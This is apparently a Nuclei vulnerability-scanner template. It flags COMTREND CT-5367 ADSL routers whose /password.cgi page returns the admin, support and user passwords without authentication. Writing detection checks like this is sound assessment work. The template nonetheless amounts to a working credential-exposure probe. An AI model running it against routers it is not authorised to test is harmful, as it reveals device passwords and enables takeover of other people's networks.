id: comtrend-passsword-exposure

info:
  name: COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution
  author: geeknik
  severity: high
  reference: https://www.exploit-db.com/exploits/16275
  tags: router,exposure,iot

requests:
  - method: GET
    path:
      - "{{BaseURL}}/password.cgi"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "pwdAdmin ="
          - "pwdSupport ="
          - "pwdUser ="
        condition: and
